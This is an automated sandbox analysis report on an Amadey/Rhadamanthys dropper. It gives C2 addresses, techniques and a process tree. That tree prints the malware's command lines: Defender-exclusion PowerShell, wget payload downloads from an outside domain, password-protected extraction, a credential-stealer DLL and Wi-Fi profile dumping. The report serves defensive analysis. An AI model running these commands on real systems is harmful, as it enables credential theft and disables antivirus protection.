amadey | 3f80c20fecafcfa264532eae938edb81dd04c8d0335c366f0b3c4c64ad529967

Resubmissions

22-05-2024 00:08

240522-ae8cwaee3v 10

Analysis

max time kernel
59s
max time network
73s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
22-05-2024 00:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Launcher.exe
Size

364KB
MD5

93fde4e38a84c83af842f73b176ab8dc
SHA1

e8c55cc160a0a94e404f544b22e38511b9d71da8
SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
SHA512

48720aebe2158b8a58fc3431c2e6f68271fbade51303ad9cb5b0493efaec6053ff0c19a898841ef7c57a3c4d042ac8e7157fb3dc79593c1dfcdcf88e1469fdec
SSDEEP

6144:MpS9kEFKbITUvR8cy8dzQ7Lcf3Si96sfO+2RZrTql9unNrkYqliwrqH1JWP6f:Mp8KLBzQ7Lcf3SiQs2FTTql9unNrkvT2

Score

10^/10

amadey rhadamanthys 28ef06 execution spyware stealer trojan upx

Malware Config

Extracted

Family

amadey

Version

4.19

Botnet

28ef06

http://185.196.10.188

http://45.159.189.140

http://89.23.103.42

Attributes

install_dir
b4e248fdbd
install_file
Dctooux.exe
strings_key
01edd7c913096383774168b5aeebc95e
url_paths
/hb9IvshS/index.php

/hb9IvshS2/index.php

/hb9IvshS3/index.php

rc4.plain

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
stealer rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

plugin4559

description pid process target process

PID 2604 created 2536 2604 plugin4559 sihost.exe
Blocklisted process makes network request 2 IoCs

Processes:

rundll32.exe

flow pid process

19 884 rundll32.exe
20 884 rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Start PowerShell.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1556 powershell.exe
988 powershell.exe
3780 powershell.exe
Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

description	pid	process	target process
PID 2604 created 2536	2604	plugin4559	sihost.exe

flow	pid	process
19	884	rundll32.exe
20	884	rundll32.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\services\2plugin29017	upx
behavioral4/memory/2708-125-0x0000000140000000-0x0000000140E43000-memory.dmp	upx

Downloads MZ/PE file
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

2plugin29017

pid process

2708 2plugin29017
2708 2plugin29017
Drops file in Windows directory 1 IoCs

Processes:

3plugin14170

description ioc process

File created C:\Windows\Tasks\Dctooux.job 3plugin14170

pid	process
2708	2plugin29017
2708	2plugin29017

description	ioc	process
File created	C:\Windows\Tasks\Dctooux.job	3plugin14170

Executes dropped EXE 12 IoCs

Processes:

Launhcer.exeLauncher.exewget.exewinrar.exeplugin4559wget.exewinrar.exe2plugin29017wget.exewinrar.exe3plugin14170Dctooux.exe

pid	process
1936	Launhcer.exe
3356	Launcher.exe
1160	wget.exe
688	winrar.exe
2604	plugin4559
3672	wget.exe
2416	winrar.exe
2708	2plugin29017
1248	wget.exe
3732	winrar.exe
1516	3plugin14170
3552	Dctooux.exe

Loads dropped DLL 3 IoCs

Processes:

rundll32.exerundll32.exerundll32.exe

pid process

4984 rundll32.exe
4164 rundll32.exe
884 rundll32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
4984	rundll32.exe
4164	rundll32.exe
884	rundll32.exe

Program crash 25 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1144	2604	WerFault.exe	plugin4559
2648	1516	WerFault.exe	3plugin14170
2944	1516	WerFault.exe	3plugin14170
2228	1516	WerFault.exe	3plugin14170
3128	1516	WerFault.exe	3plugin14170
720	1516	WerFault.exe	3plugin14170
1196	1516	WerFault.exe	3plugin14170
3500	1516	WerFault.exe	3plugin14170
2240	1516	WerFault.exe	3plugin14170
552	1516	WerFault.exe	3plugin14170
3724	1516	WerFault.exe	3plugin14170
4160	3552	WerFault.exe	Dctooux.exe
3232	3552	WerFault.exe	Dctooux.exe
2600	3552	WerFault.exe	Dctooux.exe
3952	3552	WerFault.exe	Dctooux.exe
368	3552	WerFault.exe	Dctooux.exe
3644	3552	WerFault.exe	Dctooux.exe
1988	3552	WerFault.exe	Dctooux.exe
4648	3552	WerFault.exe	Dctooux.exe
2424	3552	WerFault.exe	Dctooux.exe
3120	3552	WerFault.exe	Dctooux.exe
4252	3552	WerFault.exe	Dctooux.exe
4996	3552	WerFault.exe	Dctooux.exe
2064	3552	WerFault.exe	Dctooux.exe
2144	3552	WerFault.exe	Dctooux.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

Launcher.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Launcher.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

powershell.exepowershell.exeplugin4559dialer.exe2plugin29017powershell.exerundll32.exe

pid	process
1556	powershell.exe
1556	powershell.exe
988	powershell.exe
988	powershell.exe
2604	plugin4559
2604	plugin4559
4028	dialer.exe
4028	dialer.exe
4028	dialer.exe
4028	dialer.exe
2708	2plugin29017
2708	2plugin29017
2708	2plugin29017
3780	powershell.exe
884	rundll32.exe
884	rundll32.exe
884	rundll32.exe
884	rundll32.exe
884	rundll32.exe
884	rundll32.exe
3780	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 1556 powershell.exe
Token: SeDebugPrivilege 988 powershell.exe
Token: SeDebugPrivilege 3780 powershell.exe
Suspicious use of FindShellTrayWindow 10 IoCs

Processes:

wget.exewinrar.exewget.exewinrar.exewget.exewinrar.exe3plugin14170

pid process

1160 wget.exe
688 winrar.exe
688 winrar.exe
3672 wget.exe
2416 winrar.exe
2416 winrar.exe
1248 wget.exe
3732 winrar.exe
3732 winrar.exe
1516 3plugin14170

description	pid	process
Token: SeDebugPrivilege	1556	powershell.exe
Token: SeDebugPrivilege	988	powershell.exe
Token: SeDebugPrivilege	3780	powershell.exe

pid	process
1160	wget.exe
688	winrar.exe
688	winrar.exe
3672	wget.exe
2416	winrar.exe
2416	winrar.exe
1248	wget.exe
3732	winrar.exe
3732	winrar.exe
1516	3plugin14170

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

Launcher.exeLaunhcer.exepowershell.exeLauncher.exeplugin45593plugin14170Dctooux.exerundll32.exerundll32.exe

description	pid	process	target process
PID 1788 wrote to memory of 1936	1788	Launcher.exe	Launhcer.exe
PID 1788 wrote to memory of 1936	1788	Launcher.exe	Launhcer.exe
PID 1788 wrote to memory of 1936	1788	Launcher.exe	Launhcer.exe
PID 1788 wrote to memory of 1936	1788	Launcher.exe	Launhcer.exe
PID 1788 wrote to memory of 1936	1788	Launcher.exe	Launhcer.exe
PID 1936 wrote to memory of 1556	1936	Launhcer.exe	powershell.exe
PID 1936 wrote to memory of 1556	1936	Launhcer.exe	powershell.exe
PID 1936 wrote to memory of 1556	1936	Launhcer.exe	powershell.exe
PID 1556 wrote to memory of 3356	1556	powershell.exe	Launcher.exe
PID 1556 wrote to memory of 3356	1556	powershell.exe	Launcher.exe
PID 1556 wrote to memory of 3356	1556	powershell.exe	Launcher.exe
PID 1556 wrote to memory of 3356	1556	powershell.exe	Launcher.exe
PID 1556 wrote to memory of 3356	1556	powershell.exe	Launcher.exe
PID 3356 wrote to memory of 988	3356	Launcher.exe	powershell.exe
PID 3356 wrote to memory of 988	3356	Launcher.exe	powershell.exe
PID 3356 wrote to memory of 988	3356	Launcher.exe	powershell.exe
PID 3356 wrote to memory of 1160	3356	Launcher.exe	wget.exe
PID 3356 wrote to memory of 1160	3356	Launcher.exe	wget.exe
PID 3356 wrote to memory of 1160	3356	Launcher.exe	wget.exe
PID 3356 wrote to memory of 688	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 688	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 688	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 2604	3356	Launcher.exe	plugin4559
PID 3356 wrote to memory of 2604	3356	Launcher.exe	plugin4559
PID 3356 wrote to memory of 2604	3356	Launcher.exe	plugin4559
PID 3356 wrote to memory of 3672	3356	Launcher.exe	wget.exe
PID 3356 wrote to memory of 3672	3356	Launcher.exe	wget.exe
PID 3356 wrote to memory of 3672	3356	Launcher.exe	wget.exe
PID 2604 wrote to memory of 4028	2604	plugin4559	dialer.exe
PID 2604 wrote to memory of 4028	2604	plugin4559	dialer.exe
PID 2604 wrote to memory of 4028	2604	plugin4559	dialer.exe
PID 2604 wrote to memory of 4028	2604	plugin4559	dialer.exe
PID 2604 wrote to memory of 4028	2604	plugin4559	dialer.exe
PID 3356 wrote to memory of 2416	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 2416	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 2416	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 2708	3356	Launcher.exe	2plugin29017
PID 3356 wrote to memory of 2708	3356	Launcher.exe	2plugin29017
PID 3356 wrote to memory of 1248	3356	Launcher.exe	wget.exe
PID 3356 wrote to memory of 1248	3356	Launcher.exe	wget.exe
PID 3356 wrote to memory of 1248	3356	Launcher.exe	wget.exe
PID 3356 wrote to memory of 3732	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 3732	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 3732	3356	Launcher.exe	winrar.exe
PID 3356 wrote to memory of 1516	3356	Launcher.exe	3plugin14170
PID 3356 wrote to memory of 1516	3356	Launcher.exe	3plugin14170
PID 3356 wrote to memory of 1516	3356	Launcher.exe	3plugin14170
PID 1516 wrote to memory of 3552	1516	3plugin14170	Dctooux.exe
PID 1516 wrote to memory of 3552	1516	3plugin14170	Dctooux.exe
PID 1516 wrote to memory of 3552	1516	3plugin14170	Dctooux.exe
PID 3552 wrote to memory of 4984	3552	Dctooux.exe	rundll32.exe
PID 3552 wrote to memory of 4984	3552	Dctooux.exe	rundll32.exe
PID 3552 wrote to memory of 4984	3552	Dctooux.exe	rundll32.exe
PID 3356 wrote to memory of 5100	3356	Launcher.exe	cmd.exe
PID 3356 wrote to memory of 5100	3356	Launcher.exe	cmd.exe
PID 3356 wrote to memory of 5100	3356	Launcher.exe	cmd.exe
PID 3552 wrote to memory of 4164	3552	Dctooux.exe	rundll32.exe
PID 3552 wrote to memory of 4164	3552	Dctooux.exe	rundll32.exe
PID 3552 wrote to memory of 4164	3552	Dctooux.exe	rundll32.exe
PID 4164 wrote to memory of 884	4164	rundll32.exe	rundll32.exe
PID 4164 wrote to memory of 884	4164	rundll32.exe	rundll32.exe
PID 884 wrote to memory of 1664	884	rundll32.exe	netsh.exe
PID 884 wrote to memory of 1664	884	rundll32.exe	netsh.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2536
- C:\Windows\SysWOW64\dialer.exe
  "C:\Windows\system32\dialer.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4028

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"
1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1788
- C:\Users\Admin\AppData\Roaming\services\Launhcer.exe
  "C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1936
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe
      "C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:3356
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:988
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:1160
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:688
    - - C:\Users\Admin\AppData\Roaming\services\plugin4559
        
        C:\Users\Admin\AppData\Roaming\services\plugin4559
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2604
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 536
        6⤵
        Program crash
        
        PID:1144
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:3672
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:2416
    - - C:\Users\Admin\AppData\Roaming\services\2plugin29017
        
        C:\Users\Admin\AppData\Roaming\services\2plugin29017
        5⤵
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2708
      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3780
    - - C:\Users\Admin\AppData\Roaming\services\wget.exe
        
        "C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:1248
    - - C:\Users\Admin\AppData\Roaming\services\winrar.exe
        
        "C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services
        5⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        
        PID:3732
    - - C:\Users\Admin\AppData\Roaming\services\3plugin14170
        
        C:\Users\Admin\AppData\Roaming\services\3plugin14170
        5⤵
        Drops file in Windows directory
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of WriteProcessMemory
        
        PID:1516
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 772
        6⤵
        Program crash
        
        PID:2648
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 816
        6⤵
        Program crash
        
        PID:2944
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 896
        6⤵
        Program crash
        
        PID:2228
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 948
        6⤵
        Program crash
        
        PID:3128
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 964
        6⤵
        Program crash
        
        PID:720
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 952
        6⤵
        Program crash
        
        PID:1196
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 1048
        6⤵
        Program crash
        
        PID:3500
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 1048
        6⤵
        Program crash
        
        PID:2240
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 1160
        6⤵
        Program crash
        
        PID:552
      - C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe
        
        "C:\Users\Admin\AppData\Local\Temp\b4e248fdbd\Dctooux.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3552
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 608
        7⤵
        Program crash
        
        PID:4160
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 648
        7⤵
        Program crash
        
        PID:3232
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 692
        7⤵
        Program crash
        
        PID:2600
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 672
        7⤵
        Program crash
        
        PID:3952
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 832
        7⤵
        Program crash
        
        PID:368
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 872
        7⤵
        Program crash
        
        PID:3644
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 832
        7⤵
        Program crash
        
        PID:1988
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 904
        7⤵
        Program crash
        
        PID:4648
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1016
        7⤵
        Program crash
        
        PID:2424
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1136
        7⤵
        Program crash
        
        PID:3120
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1368
        7⤵
        Program crash
        
        PID:4252
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1384
        7⤵
        Program crash
        
        PID:4996
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1440
        7⤵
        Program crash
        
        PID:2064
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3552 -s 1660
        7⤵
        Program crash
        
        PID:2144
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\1000012011\988d497ab3.dll, Main
        7⤵
        Loads dropped DLL
        
        PID:4984
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
        7⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:4164
        
        C:\Windows\system32\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\cred64.dll, Main
        8⤵
        Blocklisted process makes network request
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:884
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        9⤵
        
        PID:1664
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1516 -s 844
        6⤵
        Program crash
        
        PID:3724
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
        5⤵
        
        PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2604 -ip 2604
1⤵
PID:1820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1516 -ip 1516
1⤵
PID:2120

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1516 -ip 1516
1⤵
PID:560

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1516 -ip 1516
1⤵
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1516 -ip 1516
1⤵
PID:3832

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1516 -ip 1516
1⤵
PID:4920

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1516 -ip 1516
1⤵
